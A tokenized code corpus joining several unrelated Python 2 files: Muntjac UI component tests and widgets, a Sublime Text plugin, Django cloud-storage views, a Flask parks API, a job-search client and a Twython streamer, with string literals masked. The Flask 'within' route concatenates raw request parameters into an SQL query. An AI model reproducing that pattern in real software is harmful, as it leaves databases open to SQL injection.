_componentPosition ) <EOL> def testAbsoluteLayoutDetachListener ( self ) : <EOL> comp = Label ( ) <EOL> self . _absolutelayout . addComponent ( comp ) <EOL> self . resetVariables ( ) <EOL> self . _absolutelayout . removeComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _detachCounter ) <EOL> self . assertEquals ( comp , self . _detachedComponent ) <EOL> self . assertEquals ( self . _absolutelayout , self . _detachedTarget ) <EOL> self . assertFalse ( self . _foundInContainer ) <EOL> self . assertIsNone ( self . _componentPosition ) <EOL> def testCSSLayoutAttachListener ( self ) : <EOL> self . resetVariables ( ) <EOL> comp = Label ( ) <EOL> self . _csslayout . addComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _attachCounter ) <EOL> self . assertEquals ( comp , self . _attachedComponent ) <EOL> self . assertEquals ( self . _csslayout , self . _attachTarget ) <EOL> self . assertTrue ( self . _foundInContainer ) <EOL> def testCSSLayoutDetachListener ( self ) : <EOL> comp = Label ( ) <EOL> self . _csslayout . addComponent ( comp ) <EOL> self . resetVariables ( ) <EOL> self . _csslayout . removeComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _detachCounter ) <EOL> self . assertEquals ( comp , self . _detachedComponent ) <EOL> self . assertEquals ( self . _csslayout , self . _detachedTarget ) <EOL> self . assertFalse ( self . _foundInContainer ) <EOL> class MyAttachListener ( IComponentAttachListener ) : <EOL> def __init__ ( self , test ) : <EOL> self . _test = test <EOL> def componentAttachedToContainer ( self , event ) : <EOL> self . _test . _attachCounter += <NUM_LIT:1> <EOL> self . _test . _attachedComponent = event . getAttachedComponent ( ) <EOL> self . _test . _attachTarget = event . getContainer ( ) <EOL> it = self . _test . _attachTarget . getComponentIterator ( ) <EOL> while True : <EOL> try : <EOL> if it . next ( ) == self . _test . _attachedComponent : <EOL> self . _test . _foundInContainer = True <EOL> break <EOL> except StopIteration : <EOL> break <EOL> if isinstance ( self . _test . _attachTarget , AbstractOrderedLayout ) : <EOL> self . _test . _indexOfComponent = self . _test . _attachTarget . getComponentIndex ( <EOL> self . _test . _attachedComponent ) <EOL> elif isinstance ( self . _test . _attachTarget , GridLayout ) : <EOL> self . _test . _componentArea = self . _test . _attachTarget . getComponentArea ( <EOL> self . _test . _attachedComponent ) <EOL> elif isinstance ( self . _test . _attachTarget , AbsoluteLayout ) : <EOL> self . _test . _componentPosition = self . _test . _attachTarget . getPosition ( <EOL> self . _test . _attachedComponent ) <EOL> class MyDetachListener ( IComponentDetachListener ) : <EOL> def __init__ ( self , test ) : <EOL> self . _test = test <EOL> def componentDetachedFromContainer ( self , event ) : <EOL> self . _test . _detachCounter += <NUM_LIT:1> <EOL> self . _test . _detachedComponent = event . getDetachedComponent ( ) <EOL> self . _test . _detachedTarget = event . getContainer ( ) <EOL> it = self . _test . _detachedTarget . getComponentIterator ( ) <EOL> while True : <EOL> try : <EOL> if it . next ( ) == self . _test . _detachedComponent : <EOL> self . _test . _foundInContainer = True <EOL> break <EOL> except StopIteration : <EOL> break <EOL> if isinstance ( self . _test . _detachedTarget , AbstractOrderedLayout ) : <EOL> self . _test . _indexOfComponent = self . _test . _detachedTarget . getComponentIndex ( <EOL> self . _test . _detachedComponent ) <EOL> elif isinstance ( self . _test . _detachedTarget , GridLayout ) : <EOL> self . _test . _componentArea = self . _test . _detachedTarget . getComponentArea ( <EOL> self . _test . _detachedComponent ) <EOL> elif isinstance ( self . _test . _detachedTarget , AbsoluteLayout ) : <EOL> self . _test . _componentPosition = self . _test . _detachedTarget . getPosition ( <EOL> self . _test . _detachedComponent ) </s>
<s> """<STR_LIT>""" </s>
<s> from muntjac . event . transferable_impl import TransferableImpl <EOL> from muntjac . event . dd . drag_source import IDragSource <EOL> from muntjac . event . dd . drop_target import IDropTarget <EOL> from muntjac . event . dd . target_details_impl import TargetDetailsImpl <EOL> from muntjac . ui . html5_file import Html5File <EOL> from muntjac . ui . custom_component import CustomComponent <EOL> from muntjac . terminal . gwt . client . mouse_event_details import MouseEventDetails <EOL> from muntjac . terminal . stream_variable import ( IStreamVariable , IStreamingEndEvent , IStreamingErrorEvent , <EOL> IStreamingProgressEvent , IStreamingStartEvent ) <EOL> from muntjac . terminal . gwt . client . ui . dd . horizontal_drop_location import HorizontalDropLocation <EOL> from muntjac . terminal . gwt . client . ui . dd . vertical_drop_location import VerticalDropLocation <EOL> class DragAndDropWrapper ( CustomComponent , IDropTarget , IDragSource ) : <EOL> CLIENT_WIDGET = None <EOL> def __init__ ( self , root ) : <EOL> """<STR_LIT>""" <EOL> super ( DragAndDropWrapper , self ) . __init__ ( root ) <EOL> self . _receivers = dict ( ) <EOL> self . _dragStartMode = DragStartMode . NONE <EOL> self . _dropHandler = None <EOL> def paintContent ( self , target ) : <EOL> super ( DragAndDropWrapper , self ) . paintContent ( target ) <EOL> target . addAttribute ( '<STR_LIT>' , <EOL> DragStartMode . ordinal ( self . _dragStartMode ) ) <EOL> if self . getDropHandler ( ) is not None : <EOL> self . getDropHandler ( ) . getAcceptCriterion ( ) . paint ( target ) <EOL> if self . _receivers is not None and len ( self . _receivers ) > <NUM_LIT:0> : <EOL> for idd , html5File in self . _receivers . iteritems ( ) : <EOL> if html5File . getStreamVariable ( ) is not None : <EOL> target . addVariable ( self , '<STR_LIT>' + idd , <EOL> ProxyReceiver ( html5File ) ) <EOL> else : <EOL> target . addVariable ( self , '<STR_LIT>' + idd , None ) <EOL> del self . _receivers [ idd ] <EOL> def getDropHandler ( self ) : <EOL> return self . _dropHandler <EOL> def setDropHandler ( self , dropHandler ) : <EOL> self . _dropHandler = dropHandler <EOL> self . requestRepaint ( ) <EOL> def translateDropTargetDetails ( self , clientVariables ) : <EOL> return WrapperTargetDetails ( clientVariables , self ) <EOL> def getTransferable ( self , rawVariables ) : <EOL> return WrapperTransferable ( self , rawVariables ) <EOL> def setDragStartMode ( self , dragStartMode ) : <EOL> self . _dragStartMode = dragStartMode <EOL> self . requestRepaint ( ) <EOL> def getDragStartMode ( self ) : <EOL> return self . _dragStartMode <EOL> class WrapperTransferable ( TransferableImpl ) : <EOL> def __init__ ( self , sourceComponent , rawVariables ) : <EOL> super ( WrapperTransferable , self ) . __init__ ( sourceComponent , rawVariables ) <EOL> self . _files = None <EOL> fc = rawVariables . get ( '<STR_LIT>' ) <EOL> if fc is not None : <EOL> self . _files = [ None ] * fc <EOL> for i in range ( fc ) : <EOL> fd = Html5File ( rawVariables . get ( '<STR_LIT>' % i ) , <EOL> rawVariables . get ( '<STR_LIT>' % i ) , <EOL> rawVariables . get ( '<STR_LIT>' % i ) ) <EOL> idd = rawVariables . get ( '<STR_LIT>' % i ) <EOL> self . _files [ i ] = fd <EOL> self . _sourceComponent . _receivers [ idd ] = fd <EOL> self . _sourceComponent . requestRepaint ( ) <EOL> def getDraggedComponent ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getData ( '<STR_LIT>' ) <EOL> def getMouseDownEvent ( self ) : <EOL> """<STR_LIT>""" <EOL> return MouseEventDetails . deSerialize ( self . getData ( '<STR_LIT>' ) ) <EOL> def getFiles ( self ) : <EOL> return self . _files <EOL> def getText ( self ) : <EOL> data = self . getData ( '<STR_LIT>' ) <EOL> if data is None : <EOL> data = self . getData ( '<STR_LIT>' ) <EOL> return data <EOL> def getHtml ( self ) : <EOL> data = self . getData ( '<STR_LIT>' ) <EOL> if data is None : <EOL> data = self . getData ( '<STR_LIT>' ) <EOL> return data <EOL> class WrapperTargetDetails ( TargetDetailsImpl ) : <EOL> def __init__ ( self , rawDropData , wrapper ) : <EOL> super ( WrapperTargetDetails , self ) . __init__ ( rawDropData , wrapper ) <EOL> def getAbsoluteLeft ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getData ( '<STR_LIT>' ) <EOL> def getAbsoluteTop ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getData ( '<STR_LIT>' ) <EOL> def getMouseEvent ( self ) : <EOL> """<STR_LIT>""" <EOL> return MouseEventDetails . deSerialize ( self . getData ( '<STR_LIT>' ) ) <EOL> def getVerticalDropLocation ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . getData ( '<STR_LIT>' ) <EOL> return VerticalDropLocation . valueOf [ data ] <EOL> def getHorizontalDropLocation ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . getData ( '<STR_LIT>' ) <EOL> return HorizontalDropLocation . valueOf [ data ] <EOL> def verticalDropLocation ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getVerticalDropLocation ( ) <EOL> def horizontalDropLocation ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getHorizontalDropLocation ( ) <EOL> class DragStartMode ( object ) : <EOL> NONE = '<STR_LIT>' <EOL> COMPONENT = '<STR_LIT>' <EOL> WRAPPER = '<STR_LIT>' <EOL> _values = [ NONE , COMPONENT , WRAPPER ] <EOL> @ classmethod <EOL> def values ( cls ) : <EOL> return cls . _values [ : ] <EOL> @ classmethod <EOL> def ordinal ( cls , val ) : <EOL> return cls . _values . index ( val ) <EOL> class ProxyReceiver ( IStreamVariable ) : <EOL> def __init__ ( self , fd ) : <EOL> self . _file = fd <EOL> self . _listenProgressOfUploadedFile = None <EOL> def getOutputStream ( self ) : <EOL> if self . _file . getStreamVariable ( ) is None : <EOL> return None <EOL> return self . _file . getStreamVariable ( ) . getOutputStream ( ) <EOL> def listenProgress ( self ) : <EOL> return self . _file . getStreamVariable ( ) . listenProgress ( ) <EOL> def onProgress ( self , event ) : <EOL> wrapper = ReceivingEventWrapper ( event , self . _file , self ) <EOL> self . _file . getStreamVariable ( ) . onProgress ( wrapper ) <EOL> def streamingStarted ( self , event ) : <EOL> self . _listenProgressOfUploadedFile = self . _file . getStreamVariable ( ) is not None <EOL> if self . _listenProgressOfUploadedFile : <EOL> wrapper = ReceivingEventWrapper ( event , self . _file , self ) <EOL> self . _file . getStreamVariable ( ) . streamingStarted ( wrapper ) <EOL> self . receivers . remove ( self . _file ) <EOL> event . disposeStreamVariable ( ) <EOL> def streamingFinished ( self , event ) : <EOL> if self . _listenProgressOfUploadedFile : <EOL> wrapper = ReceivingEventWrapper ( event , self . _file , self ) <EOL> self . _file . getStreamVariable ( ) . streamingFinished ( wrapper ) <EOL> def streamingFailed ( self , event ) : <EOL> if self . _listenProgressOfUploadedFile : <EOL> wrapper = ReceivingEventWrapper ( event , self . _file , self ) <EOL> self . _file . getStreamVariable ( ) . streamingFailed ( wrapper ) <EOL> def isInterrupted ( self ) : <EOL> return self . _file . getStreamVariable ( ) . isInterrupted ( ) <EOL> class ReceivingEventWrapper ( IStreamingErrorEvent , IStreamingEndEvent , <EOL> IStreamingStartEvent , IStreamingProgressEvent ) : <EOL> def __init__ ( self , e , fd , receiver ) : <EOL> self . _wrappedEvent = e <EOL> self . _file = fd <EOL> self . _receiver = receiver <EOL> def getMimeType ( self ) : <EOL> return self . _file . getType ( ) <EOL> def getFileName ( self ) : <EOL> return self . _file . getFileName ( ) <EOL> def getContentLength ( self ) : <EOL> return self . _file . getFileSize ( ) <EOL> def getReceiver ( self ) : <EOL> return self . _receiver <EOL> def getException ( self ) : <EOL> if isinstance ( self . _wrappedEvent , IStreamingErrorEvent ) : <EOL> return self . _wrappedEvent . getException ( ) <EOL> return None <EOL> def getBytesReceived ( self ) : <EOL> return self . _wrappedEvent . getBytesReceived ( ) <EOL> def disposeStreamVariable ( self ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from muntjac . data . util . object_property import ObjectProperty <EOL> from muntjac . ui . abstract_field import AbstractField <EOL> from muntjac . data import property as prop <EOL> class ProgressIndicator ( AbstractField , prop . IValueChangeListener , <EOL> prop . IProperty , prop . IViewer ) : <EOL> """<STR_LIT>""" <EOL> CLIENT_WIDGET = None <EOL> CONTENT_TEXT = <NUM_LIT:0> <EOL> CONTENT_PREFORMATTED = <NUM_LIT:1> <EOL> def __init__ ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> super ( ProgressIndicator , self ) . __init__ ( ) <EOL> self . _indeterminate = False <EOL> self . _dataSource = None <EOL> self . _pollingInterval = <NUM_LIT:1000> <EOL> nargs = len ( args ) <EOL> if nargs == <NUM_LIT:0> : <EOL> self . setPropertyDataSource ( ObjectProperty ( <NUM_LIT:0.0> , float ) ) <EOL> elif nargs == <NUM_LIT:1> : <EOL> if isinstance ( args [ <NUM_LIT:0> ] , prop . IProperty ) : <EOL> contentSource , = args <EOL> self . setPropertyDataSource ( contentSource ) <EOL> else : <EOL> value , = args <EOL> self . setPropertyDataSource ( ObjectProperty ( value , float ) ) <EOL> else : <EOL> raise ValueError , '<STR_LIT>' <EOL> def setReadOnly ( self , readOnly ) : <EOL> """<STR_LIT>""" <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> self . _dataSource . setReadOnly ( readOnly ) <EOL> def isReadOnly ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> return self . _dataSource . isReadOnly ( ) <EOL> def paintContent ( self , target ) : <EOL> """<STR_LIT>""" <EOL> target . addAttribute ( '<STR_LIT>' , self . _indeterminate ) <EOL> target . addAttribute ( '<STR_LIT>' , self . _pollingInterval ) <EOL> target . addAttribute ( '<STR_LIT:state>' , str ( self . getValue ( ) ) ) <EOL> def getValue ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> return self . _dataSource . getValue ( ) <EOL> def setValue ( self , newValue , repaintIsNotNeeded = None ) : <EOL> """<STR_LIT>""" <EOL> if repaintIsNotNeeded is None : <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> self . _dataSource . setValue ( newValue ) <EOL> else : <EOL> super ( ProgressIndicator , self ) . setValue ( newValue , <EOL> repaintIsNotNeeded ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> return str ( self . _dataSource ) <EOL> def getType ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> return self . _dataSource . getType ( ) <EOL> def getPropertyDataSource ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _dataSource <EOL> def setPropertyDataSource ( self , newDataSource ) : <EOL> """<STR_LIT>""" <EOL> if ( self . _dataSource is not None <EOL> and issubclass ( self . _dataSource . __class__ , <EOL> prop . IValueChangeNotifier ) ) : <EOL> self . _dataSource . removeListener ( self , <EOL> prop . IValueChangeListener ) <EOL> self . _dataSource = newDataSource <EOL> if ( self . _dataSource is not None <EOL> and issubclass ( self . _dataSource . __class__ , <EOL> prop . IValueChangeNotifier ) ) : <EOL> self . _dataSource . addListener ( self , prop . IValueChangeListener ) <EOL> def getContentMode ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _indeterminate <EOL> def setIndeterminate ( self , newValue ) : <EOL> """<STR_LIT>""" <EOL> self . _indeterminate = newValue <EOL> self . requestRepaint ( ) <EOL> def isIndeterminate ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _indeterminate <EOL> def setPollingInterval ( self , newValue ) : <EOL> """<STR_LIT>""" <EOL> self . _pollingInterval = newValue <EOL> self . requestRepaint ( ) <EOL> def getPollingInterval ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _pollingInterval </s>
<s> import os <EOL> import sys <EOL> import subprocess <EOL> import sublime <EOL> import sublime_plugin <EOL> class MouCommand ( sublime_plugin . WindowCommand ) : <EOL> def run ( self ) : <EOL> filename = self . window . active_view ( ) . file_name ( ) <EOL> if filename is None : <EOL> return <EOL> proc_env = os . environ . copy ( ) <EOL> encoding = sys . getfilesystemencoding ( ) <EOL> for k , v in proc_env . items ( ) : <EOL> proc_env [ k ] = os . path . expandvars ( v ) . encode ( encoding ) <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , filename ] , env = proc_env ) <EOL> def is_enabled ( self ) : <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> from django . http import HttpResponse , Http404 <EOL> from django . shortcuts import render_to_response <EOL> from django . template import RequestContext <EOL> from django . utils . importlib import import_module <EOL> from cloud_browser . app_settings import settings <EOL> from cloud_browser . cloud import get_connection , get_connection_cls , errors <EOL> from cloud_browser . common import get_int , path_parts , path_join , path_yield , relpath <EOL> MAX_LIMIT = get_connection_cls ( ) . cont_cls . max_list <EOL> def settings_view_decorator ( function ) : <EOL> """<STR_LIT>""" <EOL> dec = settings . CLOUD_BROWSER_VIEW_DECORATOR <EOL> if isinstance ( dec , basestring ) : <EOL> mod_str , _ , dec_str = dec . rpartition ( '<STR_LIT:.>' ) <EOL> if not ( mod_str and dec_str ) : <EOL> raise ImportError ( "<STR_LIT>" % mod_str ) <EOL> mod = import_module ( mod_str ) <EOL> if not hasattr ( mod , dec_str ) : <EOL> raise ImportError ( "<STR_LIT>" % dec ) <EOL> dec = getattr ( mod , dec_str ) <EOL> if dec and callable ( dec ) : <EOL> return dec ( function ) <EOL> return function <EOL> def _breadcrumbs ( path ) : <EOL> """<STR_LIT>""" <EOL> full = None <EOL> crumbs = [ ] <EOL> for part in path_yield ( path ) : <EOL> full = path_join ( full , part ) if full else part <EOL> crumbs . append ( ( full , part ) ) <EOL> return crumbs <EOL> @ settings_view_decorator <EOL> def browser ( request , path = '<STR_LIT>' , template = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> from itertools import ifilter , islice <EOL> container_path , object_path = path_parts ( path ) <EOL> incoming = request . POST or request . GET or { } <EOL> marker = incoming . get ( '<STR_LIT>' , None ) <EOL> marker_part = incoming . get ( '<STR_LIT>' , None ) <EOL> if marker_part : <EOL> marker = path_join ( object_path , marker_part ) <EOL> limit_default = settings . CLOUD_BROWSER_DEFAULT_LIST_LIMIT <EOL> limit_test = lambda x : x > <NUM_LIT:0> and ( MAX_LIMIT is None or x <= MAX_LIMIT - <NUM_LIT:1> ) <EOL> limit = get_int ( incoming . get ( '<STR_LIT>' , limit_default ) , <EOL> limit_default , <EOL> limit_test ) <EOL> conn = get_connection ( ) <EOL> containers = conn . get_containers ( ) <EOL> marker_part = None <EOL> container = None <EOL> objects = None <EOL> if container_path != '<STR_LIT>' : <EOL> cont_eq = lambda c : c . name == container_path <EOL> cont_list = list ( islice ( ifilter ( cont_eq , containers ) , <NUM_LIT:1> ) ) <EOL> if not cont_list : <EOL> raise Http404 ( "<STR_LIT>" % container_path ) <EOL> container = cont_list [ <NUM_LIT:0> ] <EOL> objects = container . get_objects ( object_path , marker , limit + <NUM_LIT:1> ) <EOL> marker = None <EOL> if len ( objects ) == limit + <NUM_LIT:1> : <EOL> objects = objects [ : limit ] <EOL> marker = objects [ - <NUM_LIT:1> ] . name <EOL> marker_part = relpath ( marker , object_path ) <EOL> return render_to_response ( template , <EOL> { '<STR_LIT:path>' : path , <EOL> '<STR_LIT>' : marker , <EOL> '<STR_LIT>' : marker_part , <EOL> '<STR_LIT>' : limit , <EOL> '<STR_LIT>' : _breadcrumbs ( path ) , <EOL> '<STR_LIT>' : container_path , <EOL> '<STR_LIT>' : containers , <EOL> '<STR_LIT>' : container , <EOL> '<STR_LIT>' : object_path , <EOL> '<STR_LIT>' : objects } , <EOL> context_instance = RequestContext ( request ) ) <EOL> @ settings_view_decorator <EOL> def document ( _ , path = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> container_path , object_path = path_parts ( path ) <EOL> conn = get_connection ( ) <EOL> try : <EOL> container = conn . get_container ( container_path ) <EOL> except errors . NoContainerException : <EOL> raise Http404 ( "<STR_LIT>" % container_path ) <EOL> except errors . NotPermittedException : <EOL> raise Http404 ( "<STR_LIT>" % container_path ) <EOL> try : <EOL> storage_obj = container . get_object ( object_path ) <EOL> except errors . NoObjectException : <EOL> raise Http404 ( "<STR_LIT>" % object_path ) <EOL> content_type = storage_obj . smart_content_type <EOL> encoding = storage_obj . smart_content_encoding <EOL> response = HttpResponse ( content = storage_obj . read ( ) , <EOL> content_type = content_type ) <EOL> if encoding not in ( None , '<STR_LIT>' ) : <EOL> response [ '<STR_LIT>' ] = encoding <EOL> return response </s>
<s> import os <EOL> from datetime import datetime <EOL> from flask import Flask , request , flash , url_for , redirect , render_template , abort <EOL> import pg <EOL> import json <EOL> app = Flask ( __name__ ) <EOL> app . config . from_pyfile ( '<STR_LIT>' ) <EOL> print dir ( app . config ) <EOL> db = pg . connect ( app . config [ '<STR_LIT>' ] , app . config [ '<STR_LIT>' ] , app . config [ '<STR_LIT>' ] , None , None , app . config [ '<STR_LIT>' ] , app . config [ '<STR_LIT>' ] ) <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def parks ( ) : <EOL> table_name = app . config [ '<STR_LIT>' ] <EOL> result = db . query ( '<STR_LIT>' + table_name + "<STR_LIT:;>" ) <EOL> return str ( json . dumps ( list ( result . dictresult ( ) ) ) ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def within ( ) : <EOL> table_name = app . config [ '<STR_LIT>' ] <EOL> lat1 = str ( request . args . get ( '<STR_LIT>' ) ) <EOL> lon1 = str ( request . args . get ( '<STR_LIT>' ) ) <EOL> lat2 = str ( request . args . get ( '<STR_LIT>' ) ) <EOL> lon2 = str ( request . args . get ( '<STR_LIT>' ) ) <EOL> limit = <NUM_LIT> <EOL> result = db . query ( "<STR_LIT>" + table_name + "<STR_LIT>" + lon1 + "<STR_LIT:U+002CU+0020>" + lat1 + "<STR_LIT:U+002CU+0020>" + lon2 + "<STR_LIT:U+002CU+0020>" + lat2 + "<STR_LIT>" + str ( limit ) + "<STR_LIT:;>" ) <EOL> return str ( json . dumps ( list ( result . dictresult ( ) ) ) ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def serveStaticResource ( resource ) : <EOL> return send_from_directory ( '<STR_LIT>' , resource ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def test ( ) : <EOL> return "<STR_LIT>" <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import urllib2 <EOL> from urlparse import urlparse <EOL> from urllib2 import HTTPError <EOL> __author__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT:1.0>" <EOL> try : <EOL> import simplejson <EOL> except ImportError : <EOL> try : <EOL> import json as simplejson <EOL> except ImportError : <EOL> try : <EOL> from django . utils import simplejson <EOL> except : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> class PythenticJobsError ( Exception ) : <EOL> def __init__ ( self , msg ) : <EOL> self . msg = msg <EOL> def __str__ ( self ) : <EOL> return repr ( self . msg ) <EOL> class pythentic : <EOL> def __init__ ( self , api_key ) : <EOL> """<STR_LIT>""" <EOL> self . base_url = "<STR_LIT>" % api_key <EOL> def checkResponse ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> if resp [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> return resp <EOL> elif resp [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> if resp [ "<STR_LIT:code>" ] == <NUM_LIT:0> : <EOL> raise PythenticJobsError ( "<STR_LIT>" ) <EOL> elif resp [ "<STR_LIT:code>" ] == <NUM_LIT:2> : <EOL> raise PythenticJobsError ( "<STR_LIT>" ) <EOL> else : <EOL> raise PythenticJobsError ( "<STR_LIT>" ) <EOL> else : <EOL> raise PythenticJobsError ( "<STR_LIT>" ) <EOL> def getCompanies ( self ) : <EOL> """<STR_LIT>""" <EOL> companies = simplejson . load ( urllib2 . urlopen ( self . base_url + "<STR_LIT>" ) ) <EOL> return self . checkResponse ( companies ) <EOL> def getLocations ( self ) : <EOL> """<STR_LIT>""" <EOL> locations = simplejson . load ( urllib2 . urlopen ( self . base_url + "<STR_LIT>" ) ) <EOL> return self . checkResponse ( locations ) <EOL> def search ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> search_url = self . base_url + "<STR_LIT>" + "<STR_LIT:&>" . join ( [ "<STR_LIT>" % ( key , value ) for ( key , value ) in kwargs . iteritems ( ) ] ) <EOL> results = simplejson . load ( urllib2 . urlopen ( search_url ) ) <EOL> return self . checkResponse ( results ) <EOL> def getJobTypes ( self ) : <EOL> """<STR_LIT>""" <EOL> retlist = simplejson . load ( urllib2 . urlopen ( self . base_url + "<STR_LIT>" ) ) <EOL> return self . checkResponse ( retlist ) <EOL> def getJobCategories ( self ) : <EOL> """<STR_LIT>""" <EOL> retlist = simplejson . load ( urllib2 . urlopen ( self . base_url + "<STR_LIT>" ) ) <EOL> return self . checkResponse ( retlist ) </s>
<s> """<STR_LIT>""" <EOL> from . . import __version__ <EOL> from . . compat import json , is_py3 <EOL> from . . helpers import _transparent_params <EOL> from . types import TwythonStreamerTypes <EOL> import requests <EOL> from requests_oauthlib import OAuth1 <EOL> import time <EOL> class TwythonStreamer ( object ) : <EOL> def __init__ ( self , app_key , app_secret , oauth_token , oauth_token_secret , <EOL> timeout = <NUM_LIT> , retry_count = None , retry_in = <NUM_LIT:10> , client_args = None , <EOL> handlers = None , chunk_size = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . auth = OAuth1 ( app_key , app_secret , <EOL> oauth_token , oauth_token_secret ) <EOL> self . client_args = client_args or { } <EOL> default_headers = { '<STR_LIT>' : '<STR_LIT>' + __version__ } <EOL> if '<STR_LIT>' not in self . client_args : <EOL> self . client_args [ '<STR_LIT>' ] = default_headers <EOL> elif '<STR_LIT>' not in self . client_args [ '<STR_LIT>' ] : <EOL> self . client_args [ '<STR_LIT>' ] . update ( default_headers ) <EOL> self . client_args [ '<STR_LIT>' ] = timeout <EOL> self . client = requests . Session ( ) <EOL> self . client . auth = self . auth <EOL> self . client . stream = True <EOL> client_args_copy = self . client_args . copy ( ) <EOL> for k , v in client_args_copy . items ( ) : <EOL> if k in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> setattr ( self . client , k , v ) <EOL> self . client_args . pop ( k ) <EOL> self . api_version = '<STR_LIT>' <EOL> self . retry_in = retry_in <EOL> self . retry_count = retry_count <EOL> StreamTypes = TwythonStreamerTypes ( self ) <EOL> self . statuses = StreamTypes . statuses <EOL> self . user = StreamTypes . user <EOL> self . site = StreamTypes . site <EOL> self . connected = False <EOL> self . handlers = handlers if handlers else [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . chunk_size = chunk_size <EOL> def _request ( self , url , method = '<STR_LIT:GET>' , params = None ) : <EOL> """<STR_LIT>""" <EOL> self . connected = True <EOL> retry_counter = <NUM_LIT:0> <EOL> method = method . lower ( ) <EOL> func = getattr ( self . client , method ) <EOL> params , _ = _transparent_params ( params ) <EOL> def _send ( retry_counter ) : <EOL> requests_args = { } <EOL> for k , v in self . client_args . items ( ) : <EOL> if k in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> requests_args [ k ] = v <EOL> while self . connected : <EOL> try : <EOL> if method == '<STR_LIT>' : <EOL> requests_args [ '<STR_LIT>' ] = params <EOL> else : <EOL> requests_args [ '<STR_LIT:data>' ] = params <EOL> response = func ( url , ** requests_args ) <EOL> except requests . exceptions . Timeout : <EOL> self . on_timeout ( ) <EOL> else : <EOL> if response . status_code != <NUM_LIT:200> : <EOL> self . on_error ( response . status_code , response . content ) <EOL> if self . retry_count and ( self . retry_count - retry_counter ) > <NUM_LIT:0> : <EOL> time . sleep ( self . retry_in ) <EOL> retry_counter += <NUM_LIT:1> <EOL> _send ( retry_counter ) <EOL> return response <EOL> while self . connected : <EOL> response = _send ( retry_counter ) <EOL> for line in response . iter_lines ( self . chunk_size ) : <EOL> if not self . connected : <EOL> break <EOL> if line : <EOL> try : <EOL> if is_py3 : <EOL> line = line . decode ( '<STR_LIT:utf-8>' ) <EOL> data = json . loads ( line ) <EOL> except ValueError : <EOL> self . on_error ( response . status_code , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> if self . on_success ( data ) : <EOL> for message_type in self . handlers : <EOL> if message_type in data : <EOL> handler = getattr ( self , <EOL> '<STR_LIT>' + message_type , <EOL> None ) <EOL> if handler and callable ( handler ) and not handler ( data . get ( message_type ) ) : <EOL> break <EOL> response . close ( ) <EOL> def on_success ( self , data ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def on_error ( self , status_code , data ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def on_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> self . connected = False </s>
